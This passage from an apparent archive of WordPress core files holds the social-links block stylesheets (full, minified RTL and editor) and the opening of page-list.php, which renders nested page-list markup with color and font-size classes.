  background-color:#f6405f;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-patreon{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pinterest{
  background-color:#e60122;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pocket{
  background-color:#ef4155;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-reddit{
  background-color:#ff4500;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-skype{
  background-color:#0478d7;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-snapchat{
  background-color:#fefc00;
  color:#fff;
  stroke:#000;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-soundcloud{
  background-color:#ff5600;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-spotify{
  background-color:#1bd760;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-telegram{
  background-color:#2aabee;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-threads{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tiktok{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tumblr{
  background-color:#011835;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitch{
  background-color:#6440a4;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitter{
  background-color:#1da1f2;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vimeo{
  background-color:#1eb7ea;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vk{
  background-color:#4680c2;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-wordpress{
  background-color:#3499cd;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-whatsapp{
  background-color:#25d366;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-x{
  background-color:#000;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-yelp{
  background-color:#d32422;
  color:#fff;
}
:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-youtube{
  background-color:red;
  color:#fff;
}

:where(.wp-block-social-links.is-style-logos-only) .wp-social-link{
  background:none;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link svg{
  height:1.25em;
  width:1.25em;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-amazon{
  color:#f90;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bandcamp{
  color:#1ea0c3;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-behance{
  color:#0757fe;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bluesky{
  color:#0a7aff;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-codepen{
  color:#1e1f26;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-deviantart{
  color:#02e49b;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dribbble{
  color:#e94c89;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dropbox{
  color:#4280ff;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-etsy{
  color:#f45800;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-facebook{
  color:#1778f2;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-fivehundredpx{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-flickr{
  color:#0461dd;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-foursquare{
  color:#e65678;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-github{
  color:#24292d;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-goodreads{
  color:#382110;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-google{
  color:#ea4434;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-gravatar{
  color:#1d4fc4;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-instagram{
  color:#f00075;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-lastfm{
  color:#e21b24;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-linkedin{
  color:#0d66c2;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-mastodon{
  color:#3288d4;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-medium{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-meetup{
  color:#f6405f;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-patreon{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pinterest{
  color:#e60122;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pocket{
  color:#ef4155;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-reddit{
  color:#ff4500;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-skype{
  color:#0478d7;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-snapchat{
  color:#fff;
  stroke:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-soundcloud{
  color:#ff5600;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-spotify{
  color:#1bd760;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-telegram{
  color:#2aabee;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-threads{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tiktok{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tumblr{
  color:#011835;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitch{
  color:#6440a4;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitter{
  color:#1da1f2;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vimeo{
  color:#1eb7ea;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vk{
  color:#4680c2;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-whatsapp{
  color:#25d366;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-wordpress{
  color:#3499cd;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-x{
  color:#000;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-yelp{
  color:#d32422;
}
:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-youtube{
  color:red;
}

.wp-block-social-links.is-style-pill-shape .wp-social-link{
  width:auto;
}

:root :where(.wp-block-social-links .wp-social-link a){
  padding:.25em;
}

:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link a){
  padding:0;
}

:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link a){
  padding-left:.66667em;
  padding-right:.66667em;
}

.wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{
  color:#000;
}social-links/style-rtl.min.css000060400000026521151330427370012376 0ustar00.wp-block-social-links{background:none;box-sizing:border-box;margin-right:0;padding-left:0;padding-right:0;text-indent:0}.wp-block-social-links .wp-social-link a,.wp-block-social-links .wp-social-link a:hover{border-bottom:0;box-shadow:none;text-decoration:none}.wp-block-social-links .wp-social-link svg{height:1em;width:1em}.wp-block-social-links .wp-social-link span:not(.screen-reader-text){font-size:.65em;margin-left:.5em;margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-huge-icon-size{font-size:48px}.wp-block-social-links.aligncenter{display:flex;justify-content:center}.wp-block-social-links.alignright{justify-content:flex-end}.wp-block-social-link{border-radius:9999px;display:block;height:auto;transition:transform .1s ease}@media (prefers-reduced-motion:reduce){.wp-block-social-link{transition-delay:0s;transition-duration:0s}}.wp-block-social-link a{align-items:center;display:flex;line-height:0;transition:transform .1s ease}.wp-block-social-link:hover{transform:scale(1.1)}.wp-block-social-links .wp-block-social-link.wp-social-link{display:inline-block;margin:0;padding:0}.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor svg,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:active,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:hover,.wp-block-social-links .wp-block-social-link.wp-social-link .wp-block-social-link-anchor:visited{color:currentColor;fill:currentColor}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link{background-color:#f0f0f0;color:#444}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-amazon{background-color:#f90;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bandcamp{background-color:#1ea0c3;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-behance{background-color:#0757fe;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-bluesky{background-color:#0a7aff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-codepen{background-color:#1e1f26;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-deviantart{background-color:#02e49b;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dribbble{background-color:#e94c89;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-dropbox{background-color:#4280ff;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-etsy{background-color:#f45800;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-facebook{background-color:#1778f2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-fivehundredpx{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-flickr{background-color:#0461dd;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-foursquare{background-color:#e65678;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-github{background-color:#24292d;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-goodreads{background-color:#eceadd;color:#382110}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-google{background-color:#ea4434;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-gravatar{background-color:#1d4fc4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-instagram{background-color:#f00075;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-lastfm{background-color:#e21b24;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-linkedin{background-color:#0d66c2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-mastodon{background-color:#3288d4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-medium{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-meetup{background-color:#f6405f;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-patreon{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pinterest{background-color:#e60122;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-pocket{background-color:#ef4155;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-reddit{background-color:#ff4500;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-skype{background-color:#0478d7;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-snapchat{background-color:#fefc00;color:#fff;stroke:#000}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-soundcloud{background-color:#ff5600;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-spotify{background-color:#1bd760;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-telegram{background-color:#2aabee;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-threads{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tiktok{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-tumblr{background-color:#011835;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitch{background-color:#6440a4;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-twitter{background-color:#1da1f2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vimeo{background-color:#1eb7ea;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-vk{background-color:#4680c2;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-wordpress{background-color:#3499cd;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-whatsapp{background-color:#25d366;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-x{background-color:#000;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-yelp{background-color:#d32422;color:#fff}:where(.wp-block-social-links:not(.is-style-logos-only)) .wp-social-link-youtube{background-color:red;color:#fff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link{background:none}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link svg{height:1.25em;width:1.25em}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-amazon{color:#f90}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bandcamp{color:#1ea0c3}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-behance{color:#0757fe}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-bluesky{color:#0a7aff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-codepen{color:#1e1f26}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-deviantart{color:#02e49b}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dribbble{color:#e94c89}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-dropbox{color:#4280ff}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-etsy{color:#f45800}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-facebook{color:#1778f2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-fivehundredpx{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-flickr{color:#0461dd}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-foursquare{color:#e65678}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-github{color:#24292d}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-goodreads{color:#382110}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-google{color:#ea4434}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-gravatar{color:#1d4fc4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-instagram{color:#f00075}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-lastfm{color:#e21b24}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-linkedin{color:#0d66c2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-mastodon{color:#3288d4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-medium{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-meetup{color:#f6405f}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-patreon{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pinterest{color:#e60122}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-pocket{color:#ef4155}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-reddit{color:#ff4500}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-skype{color:#0478d7}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-snapchat{color:#fff;stroke:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-soundcloud{color:#ff5600}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-spotify{color:#1bd760}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-telegram{color:#2aabee}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-threads{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tiktok{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-tumblr{color:#011835}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitch{color:#6440a4}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-twitter{color:#1da1f2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vimeo{color:#1eb7ea}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-vk{color:#4680c2}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-whatsapp{color:#25d366}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-wordpress{color:#3499cd}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-x{color:#000}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-yelp{color:#d32422}:where(.wp-block-social-links.is-style-logos-only) .wp-social-link-youtube{color:red}.wp-block-social-links.is-style-pill-shape .wp-social-link{width:auto}:root :where(.wp-block-social-links .wp-social-link a){padding:.25em}:root :where(.wp-block-social-links.is-style-logos-only .wp-social-link a){padding:0}:root :where(.wp-block-social-links.is-style-pill-shape .wp-social-link a){padding-left:.66667em;padding-right:.66667em}.wp-block-social-links:not(.has-icon-color):not(.has-icon-background-color) .wp-social-link-snapchat .wp-block-social-link-label{color:#000}social-links/editor.css000060400000004247151330427370011144 0ustar00.wp-block-social-links div.block-editor-url-input{
  display:inline-block;
  margin-left:8px;
}

.wp-social-link:hover{
  transform:none;
}

:root :where(.wp-block-social-links),:root :where(.wp-block-social-links.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link){
  padding:0;
}

:root :where(.wp-block-social-links__social-placeholder .wp-social-link){
  padding:.25em;
}

:root :where(.wp-block-social-links.is-style-pill-shape .wp-block-social-links__social-placeholder .wp-social-link){
  padding-left:.66667em;
  padding-right:.66667em;
}

.wp-block-social-links__social-placeholder{
  display:flex;
  list-style:none;
  opacity:.8;
}
.wp-block-social-links__social-placeholder>.wp-social-link{
  margin-left:0 !important;
  margin-right:0 !important;
  padding-left:0 !important;
  padding-right:0 !important;
  visibility:hidden;
  width:0 !important;
}
.wp-block-social-links__social-placeholder>.wp-block-social-links__social-placeholder-icons{
  display:flex;
}
.wp-block-social-links__social-placeholder .wp-social-link:before{
  border-radius:50%;
  content:"";
  display:block;
  height:1em;
  width:1em;
}
.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link:before{
  background:currentColor;
}

.wp-block-social-links .wp-block-social-links__social-prompt{
  cursor:default;
  font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;
  font-size:13px;
  line-height:24px;
  list-style:none;
  margin-bottom:auto;
  margin-top:auto;
  min-height:24px;
  padding-right:8px;
}

.wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{
  justify-content:center;
}

.block-editor-block-preview__content .components-button:disabled{
  opacity:1;
}

.wp-social-link.wp-social-link__is-incomplete{
  opacity:.5;
}
@media (prefers-reduced-motion:reduce){
  .wp-social-link.wp-social-link__is-incomplete{
    transition-delay:0s;
    transition-duration:0s;
  }
}

.wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{
  opacity:1;
}social-links/editor.min.css000060400000003755151330427370011731 0ustar00.wp-block-social-links div.block-editor-url-input{display:inline-block;margin-left:8px}.wp-social-link:hover{transform:none}:root :where(.wp-block-social-links),:root :where(.wp-block-social-links.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link){padding:0}:root :where(.wp-block-social-links__social-placeholder .wp-social-link){padding:.25em}:root :where(.wp-block-social-links.is-style-pill-shape .wp-block-social-links__social-placeholder .wp-social-link){padding-left:.66667em;padding-right:.66667em}.wp-block-social-links__social-placeholder{display:flex;list-style:none;opacity:.8}.wp-block-social-links__social-placeholder>.wp-social-link{margin-left:0!important;margin-right:0!important;padding-left:0!important;padding-right:0!important;visibility:hidden;width:0!important}.wp-block-social-links__social-placeholder>.wp-block-social-links__social-placeholder-icons{display:flex}.wp-block-social-links__social-placeholder .wp-social-link:before{border-radius:50%;content:"";display:block;height:1em;width:1em}.is-style-logos-only .wp-block-social-links__social-placeholder .wp-social-link:before{background:currentColor}.wp-block-social-links .wp-block-social-links__social-prompt{cursor:default;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif;font-size:13px;line-height:24px;list-style:none;margin-bottom:auto;margin-top:auto;min-height:24px;padding-right:8px}.wp-block.wp-block-social-links.aligncenter,.wp-block[data-align=center]>.wp-block-social-links{justify-content:center}.block-editor-block-preview__content .components-button:disabled{opacity:1}.wp-social-link.wp-social-link__is-incomplete{opacity:.5}@media (prefers-reduced-motion:reduce){.wp-social-link.wp-social-link__is-incomplete{transition-delay:0s;transition-duration:0s}}.wp-block-social-links .is-selected .wp-social-link__is-incomplete,.wp-social-link.wp-social-link__is-incomplete:focus,.wp-social-link.wp-social-link__is-incomplete:hover{opacity:1}page-list.php000060400000032376151330427370007156 0ustar00<?php
/**
 * Server-side rendering of the `core/pages` block.
 *
 * @package WordPress
 */

/**
 * Build an array with CSS classes and inline styles defining the colors
 * which will be applied to the pages markup in the front-end when it is a descendant of navigation.
 *
 * @since 5.8.0
 *
 * @param  array $attributes Block attributes.
 * @param  array $context    Navigation block context.
 * @return array Colors CSS classes and inline styles.
 */
function block_core_page_list_build_css_colors( $attributes, $context ) {
	$colors = array(
		'css_classes'           => array(),
		'inline_styles'         => '',
		'overlay_css_classes'   => array(),
		'overlay_inline_styles' => '',
	);

	// Text color.
	$has_named_text_color  = array_key_exists( 'textColor', $context );
	$has_picked_text_color = array_key_exists( 'customTextColor', $context );
	$has_custom_text_color = isset( $context['style']['color']['text'] );

	// If has text color.
	if ( $has_custom_text_color || $has_picked_text_color || $has_named_text_color ) {
		// Add has-text-color class.
		$colors['css_classes'][] = 'has-text-color';
	}

	if ( $has_named_text_color ) {
		// Add the color class.
		$colors['css_classes'][] = sprintf( 'has-%s-color', _wp_to_kebab_case( $context['textColor'] ) );
	} elseif ( $has_picked_text_color ) {
		$colors['inline_styles'] .= sprintf( 'color: %s;', $context['customTextColor'] );
	} elseif ( $has_custom_text_color ) {
		// Add the custom color inline style.
		$colors['inline_styles'] .= sprintf( 'color: %s;', $context['style']['color']['text'] );
	}

	// Background color.
	$has_named_background_color  = array_key_exists( 'backgroundColor', $context );
	$has_picked_background_color = array_key_exists( 'customBackgroundColor', $context );
	$has_custom_background_color = isset( $context['style']['color']['background'] );

	// If has background color.
	if ( $has_custom_background_color || $has_picked_background_color || $has_named_background_color ) {
		// Add has-background class.
		$colors['css_classes'][] = 'has-background';
	}

	if ( $has_named_background_color ) {
		// Add the background-color class.
		$colors['css_classes'][] = sprintf( 'has-%s-background-color', _wp_to_kebab_case( $context['backgroundColor'] ) );
	} elseif ( $has_picked_background_color ) {
		$colors['inline_styles'] .= sprintf( 'background-color: %s;', $context['customBackgroundColor'] );
	} elseif ( $has_custom_background_color ) {
		// Add the custom background-color inline style.
		$colors['inline_styles'] .= sprintf( 'background-color: %s;', $context['style']['color']['background'] );
	}

	// Overlay text color.
	$has_named_overlay_text_color  = array_key_exists( 'overlayTextColor', $context );
	$has_picked_overlay_text_color = array_key_exists( 'customOverlayTextColor', $context );

	// If it has a text color.
	if ( $has_named_overlay_text_color || $has_picked_overlay_text_color ) {
		$colors['overlay_css_classes'][] = 'has-text-color';
	}

	// Give overlay colors priority, fall back to Navigation block colors, then global styles.
	if ( $has_named_overlay_text_color ) {
		$colors['overlay_css_classes'][] = sprintf( 'has-%s-color', _wp_to_kebab_case( $context['overlayTextColor'] ) );
	} elseif ( $has_picked_overlay_text_color ) {
		$colors['overlay_inline_styles'] .= sprintf( 'color: %s;', $context['customOverlayTextColor'] );
	}

	// Overlay background colors.
	$has_named_overlay_background_color  = array_key_exists( 'overlayBackgroundColor', $context );
	$has_picked_overlay_background_color = array_key_exists( 'customOverlayBackgroundColor', $context );

	// If has background color.
	if ( $has_named_overlay_background_color || $has_picked_overlay_background_color ) {
		$colors['overlay_css_classes'][] = 'has-background';
	}

	if ( $has_named_overlay_background_color ) {
		$colors['overlay_css_classes'][] = sprintf( 'has-%s-background-color', _wp_to_kebab_case( $context['overlayBackgroundColor'] ) );
	} elseif ( $has_picked_overlay_background_color ) {
		$colors['overlay_inline_styles'] .= sprintf( 'background-color: %s;', $context['customOverlayBackgroundColor'] );
	}

	return $colors;
}

/**
 * Build an array with CSS classes and inline styles defining the font sizes
 * which will be applied to the pages markup in the front-end when it is a descendant of navigation.
 *
 * @since 5.8.0
 *
 * @param  array $context Navigation block context.
 * @return array Font size CSS classes and inline styles.
 */
function block_core_page_list_build_css_font_sizes( $context ) {
	// CSS classes.
	$font_sizes = array(
		'css_classes'   => array(),
		'inline_styles' => '',
	);

	$has_named_font_size  = array_key_exists( 'fontSize', $context );
	$has_custom_font_size = isset( $context['style']['typography']['fontSize'] );

	if ( $has_named_font_size ) {
		// Add the font size class.
		$font_sizes['css_classes'][] = sprintf( 'has-%s-font-size', $context['fontSize'] );
	} elseif ( $has_custom_font_size ) {
		// Add the custom font size inline style.
		$font_sizes['inline_styles'] = sprintf(
			'font-size: %s;',
			wp_get_typography_font_size_value(
				array(
					'size' => $context['style']['typography']['fontSize'],
				)
			)
		);
	}

	return $font_sizes;
}

/**
 * Outputs Page list markup from an array of pages with nested children.
 *
 * @since 5.8.0
 *
 * @param boolean $open_submenus_on_click Whether to open submenus on click instead of hover.
 * @param boolean $show_submenu_icons Whether to show submenu indicator icons.
 * @param boolean $is_navigation_child If block is a child of Navigation block.
 * @param array   $nested_pages The array of nested pages.
 * @param boolean $is_nested Whether the submenu is nested or not.
 * @param array   $active_page_ancestor_ids An array of ancestor ids for active page.
 * @param array   $colors Color information for overlay styles.
 * @param integer $depth The nesting depth.
 *
 * @return string List markup.
 */
function block_core_page_list_render_nested_page_list( $open_submenus_on_click, $show_submenu_icons, $is_navigation_child, $nested_pages, $is_nested, $active_page_ancestor_ids = array(), $colors = array(), $depth = 0 ) {
	if ( empty( $nested_pages ) ) {
		return;
	}
	$front_page_id = (int) get_option( 'page_on_front' );
	$markup        = '';
	foreach ( (array) $nested_pages as $page ) {
		$css_class       = $page['is_active'] ? ' current-menu-item' : '';
		$aria_current    = $page['is_active'] ? ' aria-current="page"' : '';
		$style_attribute = '';

		$css_class .= in_array( $page['page_id'], $active_page_ancestor_ids, true ) ? ' current-menu-ancestor' : '';
		if ( isset( $page['children'] ) ) {
			$css_class .= ' has-child';
		}

		if ( $is_navigation_child ) {
			$css_class .= ' wp-block-navigation-item';

			if ( $open_submenus_on_click ) {
				$css_class .= ' open-on-click';
			} elseif ( $show_submenu_icons ) {
				$css_class .= ' open-on-hover-click';
			}
		}

		$navigation_child_content_class = $is_navigation_child ? ' wp-block-navigation-item__content' : '';

		// If this is the first level of submenus, include the overlay colors.
		if ( ( ( 0 < $depth && ! $is_nested ) || $is_nested ) && isset( $colors['overlay_css_classes'], $colors['overlay_inline_styles'] ) ) {
			$css_class .= ' ' . trim( implode( ' ', $colors['overlay_css_classes'] ) );
			if ( '' !== $colors['overlay_inline_styles'] ) {
				$style_attribute = sprintf( ' style="%s"', esc_attr( $colors['overlay_inline_styles'] ) );
			}
		}

		if ( (int) $page['page_id'] === $front_page_id ) {
			$css_class .= ' menu-item-home';
		}

		$title      = wp_kses_post( $page['title'] );
		$aria_label = sprintf(
			/* translators: Accessibility text. %s: Parent page title. */
			__( '%s submenu' ),
			wp_strip_all_tags( $title )
		);

		$markup .= '<li class="wp-block-pages-list__item' . esc_attr( $css_class ) . '"' . $style_attribute . '>';

		if ( isset( $page['children'] ) && $is_navigation_child && $open_submenus_on_click ) {
			$markup .= '<button aria-label="' . esc_attr( $aria_label ) . '" class="' . esc_attr( $navigation_child_content_class ) . ' wp-block-navigation-submenu__toggle" aria-expanded="false">' . esc_html( $title ) .
			'</button><span class="wp-block-page-list__submenu-icon wp-block-navigation__submenu-icon"><svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12" fill="none" aria-hidden="true" focusable="false"><path d="M1.50002 4L6.00002 8L10.5 4" stroke-width="1.5"></path></svg></span>';
		} else {
			$markup .= '<a class="wp-block-pages-list__item__link' . esc_attr( $navigation_child_content_class ) . '" href="' . esc_url( $page['link'] ) . '"' . $aria_current . '>' . $title . '</a>';
		}

		if ( isset( $page['children'] ) ) {
			if ( $is_navigation_child && $show_submenu_icons && ! $open_submenus_on_click ) {
				$markup .= '<button aria-label="' . esc_attr( $aria_label ) . '" class="wp-block-navigation__submenu-icon wp-block-navigation-submenu__toggle" aria-expanded="false">';
